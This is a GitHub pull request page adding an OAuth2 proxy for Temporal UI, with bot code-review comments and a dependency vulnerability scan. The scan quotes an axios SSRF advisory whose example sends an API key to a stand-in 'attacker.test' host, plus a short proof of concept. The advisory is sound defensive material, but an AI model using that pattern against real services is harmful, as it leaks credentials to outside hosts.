feat: implement OAuth2 proxy for Temporal UI authentication by anatolyshipitz · Pull Request #10 · speedandfunction/automatization

anatolyshipitz · 2025-04-25T17:53:31Z

implement OAuth2 proxy for Temporal UI authentication

Refs #64524

…tion - Add comprehensive OAuth2 proxy setup guide - Document Google OAuth2 configuration steps - Add environment variables configuration - Include Docker Compose setup instructions - Add troubleshooting section - Document security considerations Refs #64524

coderabbitai · 2025-04-25T17:53:37Z

Walkthrough

This update introduces several new configuration and documentation files, and modifies existing Docker and environment setup files. New documentation is provided for OAuth2 Proxy and AWS Application Load Balancer (ALB) setup. The .dockerignore file is added to optimize Docker build contexts. The Docker Compose files are updated to include OAuth2 Proxy service for production, refine service environment variables, and add file watch capabilities for development. The .env.example file is updated with new placeholders for OAuth2 Proxy and Google OAuth credentials. The README is updated to clarify the port usage for Temporal UI and OAuth2 Proxy.

Changes

File(s)	Change Summary
`.dockerignore`	Added a comprehensive ignore file to exclude unnecessary files and directories from Docker build contexts.
`docker-compose.yml`	Added `develop` sections with `watch` directives for `n8n` and `temporal` services; removed three environment variables from `temporal` service.
`docker-compose.prod.yml`	Added new `oauth2-proxy` service for OAuth2 authentication; reset `ports` for `temporal-ui` service.
`.env.example`	Added `N8N_HOST` and OAuth2 Proxy/Google OAuth environment variable placeholders.
`README.md`	Updated Temporal UI port description to indicate combined use with OAuth2 proxy on port 8080.
`docs/oauth2-proxy.md`	Added new documentation detailing OAuth2 Proxy setup with Google OAuth for production environments.
`docs/alb.md`	Added new documentation describing AWS Application Load Balancer architecture and configuration, including a Mermaid diagram.

Sequence Diagram(s)

sequenceDiagram
    participant User
    participant Browser
    participant OAuth2-Proxy
    participant GoogleOAuth
    participant Temporal-UI

    User->>Browser: Access Temporal-UI URL
    Browser->>OAuth2-Proxy: HTTP request (port 8080)
    OAuth2-Proxy-->>Browser: Check authentication cookie
    alt Not authenticated
        OAuth2-Proxy->>GoogleOAuth: Redirect to Google OAuth login
        GoogleOAuth->>Browser: User authenticates
        Browser->>OAuth2-Proxy: Redirect with OAuth code
        OAuth2-Proxy->>GoogleOAuth: Exchange code for token
        GoogleOAuth-->>OAuth2-Proxy: Return token
        OAuth2-Proxy-->>Browser: Set authentication cookie
    end
    OAuth2-Proxy->>Temporal-UI: Proxy request to Temporal-UI
    Temporal-UI-->>OAuth2-Proxy: Response
    OAuth2-Proxy-->>Browser: Return Temporal-UI content

sequenceDiagram
    participant User
    participant Browser
    participant AWS ALB
    participant n8n
    participant OAuth2-Proxy
    participant Temporal-UI

    User->>Browser: Access n8n or Temporal-UI URL
    Browser->>AWS ALB: HTTPS request (port 443)
    alt n8n path
        AWS ALB->>n8n: Forward to n8n target group (port 5678)
        n8n-->>AWS ALB: Response
    else Temporal-UI path
        AWS ALB->>OAuth2-Proxy: Forward to OAuth2-Proxy target group (port 8080)
        OAuth2-Proxy->>Temporal-UI: Proxy request if authenticated
        Temporal-UI-->>OAuth2-Proxy: Response
        OAuth2-Proxy-->>AWS ALB: Response
    end
    AWS ALB-->>Browser: Return content

Suggested reviewers

killev

📜 Recent review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between b0afa64 and c69f062.

📒 Files selected for processing (1)

README.md (2 hunks)

🚧 Files skipped from review as they are similar to previous changes (1)

README.md

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

🪧 Tips

Chat

There are 3 ways to chat with CodeRabbit:

Review comments: Directly reply to a review comment made by CodeRabbit. Example:
- I pushed a fix in commit <commit_id>, please review it.
- Generate unit testing code for this file.
- Open a follow-up GitHub issue for this discussion.
Files and specific lines of code (under the "Files changed" tab): Tag @coderabbitai in a new review comment at the desired location with your query. Examples:
- @coderabbitai generate unit testing code for this file.
- @coderabbitai modularize this function.
PR comments: Tag @coderabbitai in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples:
- @coderabbitai gather interesting stats about this repository and render them as a table. Additionally, render a pie chart showing the language distribution in the codebase.
- @coderabbitai read src/utils.ts and generate unit testing code.
- @coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.
- @coderabbitai help me debug CodeRabbit configuration file.

Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments.

CodeRabbit Commands (Invoked using PR comments)

@coderabbitai pause to pause the reviews on a PR.
@coderabbitai resume to resume the paused reviews.
@coderabbitai review to trigger an incremental review. This is useful when automatic reviews are disabled for the repository.
@coderabbitai full review to do a full review from scratch and review all the files again.
@coderabbitai summary to regenerate the summary of the PR.
@coderabbitai generate docstrings to generate docstrings for this PR.
@coderabbitai generate sequence diagram to generate a sequence diagram of the changes in this PR.
@coderabbitai resolve resolve all the CodeRabbit review comments.
@coderabbitai configuration to show the current CodeRabbit configuration for the repository.
@coderabbitai help to get help.

Other keywords and placeholders

Add @coderabbitai ignore anywhere in the PR description to prevent this PR from being reviewed.
Add @coderabbitai summary to generate the high-level summary at a specific location in the PR description.
Add @coderabbitai anywhere in the PR title to generate the title automatically.

CodeRabbit Configuration File (`.coderabbit.yaml`)

You can programmatically configure CodeRabbit by adding a .coderabbit.yaml file to the root of your repository.
Please see the configuration documentation for more information.
If your editor has YAML language server enabled, you can add the path at the top of this file to enable auto-completion and validation: # yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json

Documentation and Community

Visit our Documentation for detailed information on how to use CodeRabbit.
Join our Discord Community to get help, request features, and share feedback.
Follow us on X/Twitter for updates and announcements.

…tion - Add comprehensive OAuth2 proxy setup guide - Document Google OAuth2 configuration steps - Add environment variables configuration - Include Docker Compose setup instructions - Add troubleshooting section - Document security considerations Refs #64524

github-actions · 2025-04-25T17:54:32Z

🔍 Vulnerabilities of `n8n-test:latest`

📦 Image Reference n8n-test:latest

digest	`sha256:0387d6dec298e69e15ab2dd0ea3127178cf1457f8e26a2ab5e78a6ca9b4e514c`
vulnerabilities
platform	linux/amd64
size	243 MB
packages	1628

📦 Base Image node:20-alpine

also known as	`20-alpine3.21` `20.19-alpine` `20.19-alpine3.21` `20.19.0-alpine` `20.19.0-alpine3.21` `iron-alpine` `iron-alpine3.21`
digest	`sha256:37a5a350292926f98d48de9af160b0a3f7fcb141566117ee452742739500a5bd`
vulnerabilities

stdlib 1.24.0 (golang)

pkg:golang/stdlib@1.24.0

Affected range	`>=1.24.0-0 <1.24.2`
Fixed version	`1.24.2`
EPSS Score	`0.015%`
EPSS Percentile	`2nd percentile`

Description

The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext.

semver 5.3.0 (npm)

pkg:npm/semver@5.3.0

Inefficient Regular Expression Complexity

Affected range	`<5.7.2`
Fixed version	`5.7.2`
CVSS Score	`7.5`
CVSS Vector	`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`
EPSS Score	`0.308%`
EPSS Percentile	`53rd percentile`

Description

Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

axios 1.7.4 (npm)

pkg:npm/axios@1.7.4

Server-Side Request Forgery (SSRF)

Affected range	`>=1.0.0 <1.8.2`
Fixed version	`1.8.2`
CVSS Score	`7.7`
CVSS Vector	`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P`
EPSS Score	`0.056%`
EPSS Percentile	`18th percentile`

Description

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:
import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.

Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
Run the script:
$ node main.js
this is server2
Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.

SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.

Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

cross-spawn 7.0.3 (npm)

pkg:npm/cross-spawn@7.0.3

Inefficient Regular Expression Complexity

Affected range	`>=7.0.0 <7.0.5`
Fixed version	`7.0.5`
CVSS Score	`7.5`
CVSS Vector	`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`
EPSS Score	`0.132%`
EPSS Percentile	`34th percentile`

Description

Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

pdfjs-dist 2.16.105 (npm)

pkg:npm/pdfjs-dist@2.16.105

Improper Check for Unusual or Exceptional Conditions

Affected range	`<=4.1.392`
Fixed version	`4.2.67`
CVSS Score	`8.8`
CVSS Vector	`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
EPSS Score	`14.484%`
EPSS Percentile	`94th percentile`

Description

Impact

If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.

Patches

The patch removes the use of eval:
mozilla/pdf.js#18015

Workarounds

Set the option isEvalSupported to false.

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

coderabbitai

Actionable comments posted: 2

🧹 Nitpick comments (7)

.dockerignore (2)

14-15: Remove redundant patterns
The *~ pattern appears twice in the Development files section (lines 14–15) and again in the Linux section (line 120). Consolidating these entries will reduce duplication.

Also applies to: 119-121

137-140: Trim trailing space in pattern
Line 140 (*.vhdx ) has a trailing space. Remove it to prevent unintended mismatches.

docker-compose.override.yml.example (1)

1-7: Inconsistent volume naming conventions
The example uses n8n_data (underscore) alongside opensearch-data and postgresql-data (hyphens). Standardizing on one convention (e.g., hyphens) will make config easier to read and maintain.

docs/oauth2-proxy.md (1)

23-26: Highlight insecure defaults for production
Defaults like cookie-secret-1234567890 and OAUTH2_PROXY_COOKIE_SECURE=false are insecure. Add a prominent security warning advising to:

Generate a strong OAUTH2_PROXY_COOKIE_SECRET.

Set OAUTH2_PROXY_COOKIE_SECURE=true behind TLS.
docker-compose.yml (3)
151-151: Cleanup trailing whitespace
YAMLLint flags trailing spaces on these lines. Removing them prevents lint failures:
-      - OAUTH2_PROXY_CLIENT_SECRET=${GOOGLE_CLIENT_SECRET:?GOOGLE_CLIENT_SECRET is required}␣
+      - OAUTH2_PROXY_CLIENT_SECRET=${GOOGLE_CLIENT_SECRET:?GOOGLE_CLIENT_SECRET is required}
...
Also applies to: 154-154, 162-162, 170-170, 177-177, 180-180

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 151-151: trailing spaces

(trailing-spaces)

136-142: Consider healthcheck-based startup for OAuth2 Proxy
Other services use health-conditioned depends_on. To ensure oauth2-proxy only starts once temporal-ui is healthy, you could update:
depends_on:
  temporal-ui:
    condition: service_healthy
192-196: Document override requirement for persistent volumes
The main volumes: section declares n8n_data, opensearch-data, and postgresql-data without driver options. Remind users—either in your README or this docs file—to apply the docker-compose.override.yml.example for host bindings when persisting data.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 71a8008 and 21063e9.

📒 Files selected for processing (4)

.dockerignore (1 hunks)
docker-compose.override.yml.example (1 hunks)
docker-compose.yml (3 hunks)
docs/oauth2-proxy.md (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.yml

[error] 151-151: trailing spaces

(trailing-spaces)

[error] 154-154: trailing spaces

(trailing-spaces)

[error] 162-162: trailing spaces

(trailing-spaces)

[error] 170-170: trailing spaces

(trailing-spaces)

[error] 177-177: trailing spaces

(trailing-spaces)

[error] 180-180: trailing spaces

(trailing-spaces)

🔇 Additional comments (2)

.dockerignore (1)

1-6: Comprehensive coverage of Docker build context exclusions
The patterns cleanly exclude VCS metadata, environment files, IDE configs, language-specific build artifacts, OS temp files, and project-specific binaries, which will significantly reduce build context size and improve build performance.

docker-compose.yml (1)

25-29: Verify support for develop.watch extension
The develop.watch stanza is not part of standard Docker Compose syntax. Confirm that you’re using a Compose plugin or a compatible version (e.g., Compose v2.15+ with the dev extension), and document the requirement for team members.

Also applies to: 112-115

… production config and docs Replaced all occurrences of lvh.me with temporal.speedandfunction.com in docker-compose.prod.yml Updated OAuth2 Proxy documentation to use the new domain and provide correct Google OAuth and .env setup instructions

coderabbitai

Actionable comments posted: 2

🧹 Nitpick comments (5)

README.md (2)
61-67: Use subheadings instead of bold emphasis for options
Markdown lint flags bold text used as a heading (MD036). Replace **Option A: ...** with a proper Markdown heading, for example:
- **Option A: Using the COMPOSE_FILE environment variable**
+ ##### Option A: Using the COMPOSE_FILE environment variable
🧰 Tools

🪛 markdownlint-cli2 (0.17.2)

61-61: Emphasis used instead of a heading
null

(MD036, no-emphasis-as-heading)

72-77: Use subheadings and unify CLI syntax for Option B
Replace the bold emphasis with a heading and standardize the command to docker compose (instead of docker-compose).
- **Option B: Using the -f flag**
+ ##### Option B: Using the -f flag

```bash
- docker-compose -f docker-compose.yml -f docker-compose.prod.yml up -d
+ docker compose -f docker-compose.yml -f docker-compose.prod.yml up -d
<details>
<summary>🧰 Tools</summary>

<details>
<summary>🪛 markdownlint-cli2 (0.17.2)</summary>

72-72: Emphasis used instead of a heading
null

(MD036, no-emphasis-as-heading)

</details>

</details>

</blockquote></details>
<details>
<summary>docker-compose.prod.yml (3)</summary><blockquote>

`28-42`: **Enable secure flags for cookies and CSRF tokens in production**  
Currently both `OAUTH2_PROXY_COOKIE_SECURE=false` and `OAUTH2_PROXY_CSRF_COOKIE_SECURE=false` disable the `Secure` attribute on cookies. In a production environment behind HTTPS, set these to `true` to protect cookies.  
  
```diff
- OAUTH2_PROXY_COOKIE_SECURE=false
+ OAUTH2_PROXY_COOKIE_SECURE=true

- OAUTH2_PROXY_CSRF_COOKIE_SECURE=false
+ OAUTH2_PROXY_CSRF_COOKIE_SECURE=true
🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

58-64: Ensure host directories exist for bind-mounted volumes
Binding to absolute paths (/data/n8n, /data/opensearch, /data/postgresql) requires those directories on the Docker host. Document the directory setup script or switch to relative project paths (e.g., ./volumes/...) to avoid permission issues.

🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 58-58: wrong indentation: expected 4 but found 2

(indentation)

[warning] 59-59: wrong indentation: expected 6 but found 4

(indentation)

[warning] 61-61: wrong indentation: expected 8 but found 6

(indentation)

16-16: Remove trailing whitespace
Several lines contain extraneous spaces at the end, which can trigger linter errors. Please trim trailing whitespace on the following lines: 16, 19, 27, 35, 42, 45.

Also applies to: 19-19, 27-27, 35-35, 42-42, 45-45

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 16-16: trailing spaces

(trailing-spaces)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 21063e9 and 8d6c64f.

📒 Files selected for processing (3)

README.md (1 hunks)
docker-compose.prod.yml (1 hunks)
docker-compose.yml (3 hunks)

🚧 Files skipped from review as they are similar to previous changes (1)

docker-compose.yml

🧰 Additional context used

🪛 markdownlint-cli2 (0.17.2)

README.md

61-61: Emphasis used instead of a heading
null

(MD036, no-emphasis-as-heading)

72-72: Emphasis used instead of a heading
null

(MD036, no-emphasis-as-heading)

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[warning] 6-6: wrong indentation: expected 8 but found 6

(indentation)

[warning] 8-8: wrong indentation: expected 8 but found 6

(indentation)

[warning] 10-10: wrong indentation: expected 8 but found 6

(indentation)

[warning] 13-13: wrong indentation: expected 8 but found 6

(indentation)

[error] 16-16: trailing spaces

(trailing-spaces)

[error] 19-19: trailing spaces

(trailing-spaces)

[error] 27-27: trailing spaces

(trailing-spaces)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 45-45: trailing spaces

(trailing-spaces)

[warning] 49-49: wrong indentation: expected 8 but found 6

(indentation)

[warning] 55-55: wrong indentation: expected 8 but found 6

(indentation)

[warning] 58-58: wrong indentation: expected 4 but found 2

(indentation)

[warning] 59-59: wrong indentation: expected 6 but found 4

(indentation)

[warning] 61-61: wrong indentation: expected 8 but found 6

(indentation)

[warning] 65-65: wrong indentation: expected 6 but found 4

(indentation)

[warning] 67-67: wrong indentation: expected 8 but found 6

(indentation)

[warning] 71-71: wrong indentation: expected 6 but found 4

(indentation)

[warning] 73-73: wrong indentation: expected 8 but found 6

(indentation)

[error] 75-75: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

🔇 Additional comments (4)

README.md (1)

47-55: Well-structured introduction for service startup
The new section clearly distinguishes development (default) versus production (with overrides) startup workflows. Users will appreciate the clarity.

docker-compose.prod.yml (3)

9-11: Port mapping is correct
Exposing host port 80 to container port 80 matches HTTP-based OAuth2 Proxy defaults. Ensure this aligns with your network setup or adjust if you need a non-standard port.

🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 10-10: wrong indentation: expected 8 but found 6

(indentation)

12-19: Environment variable configuration looks solid
Loading from .env and using mandatory fallback checks for GOOGLE_CLIENT_ID/SECRET is a robust approach. Domain restriction via OAUTH2_PROXY_EMAIL_DOMAINS is well-documented.

🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 13-13: wrong indentation: expected 8 but found 6

(indentation)

[error] 16-16: trailing spaces

(trailing-spaces)

[error] 19-19: trailing spaces

(trailing-spaces)

48-55: Healthcheck and network configuration
The wget-based healthcheck and attachment to app-network are appropriate. You might consider using curl --fail for clearer exit codes, but this implementation is acceptable.

🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 49-49: wrong indentation: expected 8 but found 6

(indentation)

[warning] 55-55: wrong indentation: expected 8 but found 6

(indentation)

…oduction Require OAUTH2_PROXY_COOKIE_SECRET to be explicitly set, removing insecure default Set OAUTH2_PROXY_COOKIE_SECURE and OAUTH2_PROXY_CSRF_COOKIE_SECURE to true for production Recommend disabling debug error output in production Add security best practices for handling secrets and HTTPS enforcement

coderabbitai

Actionable comments posted: 3

🧹 Nitpick comments (3)

docker-compose.prod.yml (3)
11-11: Quote multi-word environment variable value.

N8N_GOOGLE_SCOPES=email profile contains a space and should be quoted to avoid YAML parsing issues:
-      - N8N_GOOGLE_SCOPES=email profile
+      - N8N_GOOGLE_SCOPES="email profile"
31-31: Remove trailing whitespace.

Several lines have trailing spaces which can cause YAML parsers to complain. Please remove the extra spaces at the end of these lines.

Also applies to: 34-34, 42-42, 50-50, 57-57, 60-60

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 31-31: trailing spaces

(trailing-spaces)

90-90: Ensure newline at end of file.

Add a final newline to conform with POSIX standards and avoid warnings from linters.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 90-90: no new line character at the end of file

(new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 8d6c64f and 6b0a1b3.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[warning] 14-14: wrong indentation: expected 6 but found 8

(indentation)

[warning] 17-17: wrong indentation: expected 4 but found 6

(indentation)

[error] 31-31: trailing spaces

(trailing-spaces)

[error] 34-34: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 50-50: trailing spaces

(trailing-spaces)

[error] 57-57: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

[error] 90-90: no new line character at the end of file

(new-line-at-end-of-file)

Changed the OAUTH2_PROXY_REDIRECT_URL to use the correct domain temporal.speedandfunction.com for OAuth2 callback in the production docker-compose file.

coderabbitai

Actionable comments posted: 0

♻️ Duplicate comments (3)

docker-compose.prod.yml (3)
62-62: ⚠️ Potential issue

Fix duplicated domain in sign-out URL.

The OAUTH2_PROXY_SIGN_OUT_URL uses temporal.temporal.speedandfunction.com, which duplicates the subdomain. It should match the intended domain used for the redirect URL.
-        - OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.temporal.speedandfunction.com/oauth2/sign_out
+        - OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.speedandfunction.com/oauth2/sign_out
14-14: ⚠️ Potential issue

Fix indentation of volume mount under n8n.

The list item under volumes: is indented with 8 spaces but should be 6 spaces (2 spaces per nesting level). This incorrect indentation causes YAML parsing errors.

Apply this diff:
-        - /home/ubuntu/volumes/certs:/home/node/certs:ro
+      - /home/ubuntu/volumes/certs:/home/node/certs:ro
🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 14-14: wrong indentation: expected 6 but found 8

(indentation)

17-28: ⚠️ Potential issue

Correct indentation for oauth2-proxy service properties.

The properties under oauth2-proxy: are indented with 6 spaces; they must be 4 spaces to be valid YAML under the services: key. Incorrect indentation will prevent Docker Compose from recognizing these settings.

Apply this diff:
-  oauth2-proxy:
-      container_name: temporal-oauth-proxy
-      image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
-      restart: unless-stopped
-      depends_on:
-        - temporal-ui
-      env_file:
-        - .env
-      ports:
-        - "80:80"
-      environment:
-        # Google provider settings
-        - OAUTH2_PROXY_PROVIDER=google
+  oauth2-proxy:
+    container_name: temporal-oauth-proxy
+    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    restart: unless-stopped
+    depends_on:
+      - temporal-ui
+    env_file:
+      - .env
+    ports:
+      - "80:80"
+    environment:
+      # Google provider settings
+      - OAUTH2_PROXY_PROVIDER=google
🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 17-17: wrong indentation: expected 4 but found 6

(indentation)

🧹 Nitpick comments (2)

docker-compose.prod.yml (2)
31-60: Remove trailing whitespace from environment lines.

Several environment variable lines have trailing spaces, which are unnecessary and may be flagged by linters.

Affected lines: 31, 34, 42, 50, 57, 60

Please remove the trailing spaces or enable automatic trimming in your editor. Example:
-        - OAUTH2_PROXY_PROVIDER=google 
+        - OAUTH2_PROXY_PROVIDER=google
🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 31-31: trailing spaces

(trailing-spaces)

[error] 34-34: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 50-50: trailing spaces

(trailing-spaces)

[error] 57-57: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

90-90: Add newline at end of file.

POSIX standards and many tools expect a newline character at the end of the file.

Add an empty newline at the end of docker-compose.prod.yml.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 90-90: no new line character at the end of file

(new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6b0a1b3 and 1891edc.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[warning] 14-14: wrong indentation: expected 6 but found 8

(indentation)

[warning] 17-17: wrong indentation: expected 4 but found 6

(indentation)

[error] 31-31: trailing spaces

(trailing-spaces)

[error] 34-34: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 50-50: trailing spaces

(trailing-spaces)

[error] 57-57: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

[error] 90-90: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

Changed the OAUTH2_PROXY_UPSTREAMS from port 80 to 8080 in the production docker-compose file to align with the updated service configuration.

coderabbitai

Actionable comments posted: 0

♻️ Duplicate comments (3)

docker-compose.prod.yml (3)
13-14: ⚠️ Potential issue

Fix incorrect indentation for the volumes list under n8n.

The - /home/ubuntu/volumes/certs:/home/node/certs:ro entry is indented 8 spaces but should be 6 to nest correctly under volumes:.
   n8n:
     volumes:
-        - /home/ubuntu/volumes/certs:/home/node/certs:ro
+      - /home/ubuntu/volumes/certs:/home/node/certs:ro
🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 14-14: wrong indentation: expected 6 but found 8

(indentation)

62-62: ⚠️ Potential issue

Fix duplicated subdomain in OAUTH2_PROXY_SIGN_OUT_URL.

The sign-out URL uses temporal.temporal.speedandfunction.com, resulting in an invalid host. It should match the redirect domain (temporal.speedandfunction.com):
-        - OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.temporal.speedandfunction.com/oauth2/sign_out
+        - OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.speedandfunction.com/oauth2/sign_out
16-19: ⚠️ Potential issue

Correct indentation of oauth2-proxy service properties.

Properties like container_name, image, and restart are over-indented (6 spaces) and won’t be recognized. They must be indented 4 spaces under oauth2-proxy:.
 services:
   oauth2-proxy:
-      container_name: temporal-oauth-proxy
-      image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
-      restart: unless-stopped
+    container_name: temporal-oauth-proxy
+    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    restart: unless-stopped
🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 17-17: wrong indentation: expected 4 but found 6

(indentation)

🧹 Nitpick comments (3)

docker-compose.prod.yml (3)
31-60: Remove unnecessary trailing spaces on blank lines.

Blank lines in the environment: block contain leading spaces, triggering [trailing-spaces] lint errors. Strip all spaces from empty lines. Example adjustments:
-        # Email validation settings
-        
+        # Email validation settings

-        # Required settings
-        
+        # Required settings

...and so on for other commented sections...
🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 31-31: trailing spaces

(trailing-spaces)

[error] 34-34: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 50-50: trailing spaces

(trailing-spaces)

[error] 57-57: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

90-90: Ensure newline at end of file.

Add a final newline to comply with POSIX conventions and resolve the new-line-at-end-of-file error.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 90-90: no new line character at the end of file

(new-line-at-end-of-file)

1-1: Consider specifying a Compose file version.

Although Compose v3 files can omit the version field, it's best practice to declare it (e.g., version: "3.8") at the top for clarity and tooling compatibility.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 1891edc and e9f7ae4.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[warning] 14-14: wrong indentation: expected 6 but found 8

(indentation)

[warning] 17-17: wrong indentation: expected 4 but found 6

(indentation)

[error] 31-31: trailing spaces

(trailing-spaces)

[error] 34-34: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 50-50: trailing spaces

(trailing-spaces)

[error] 57-57: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

[error] 90-90: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

🔇 Additional comments (1)

docker-compose.prod.yml (1)

69-70: Verify that the app-network network is declared.

The oauth2-proxy service attaches to app-network, but this file doesn’t define a networks: section. Ensure app-network is defined here or in the base docker-compose.yml.

Updated the OAUTH2_PROXY_SIGN_OUT_URL to use the correct domain temporal.speedandfunction.com in the production docker-compose file.

coderabbitai

Actionable comments posted: 1

♻️ Duplicate comments (2)

docker-compose.prod.yml (2)
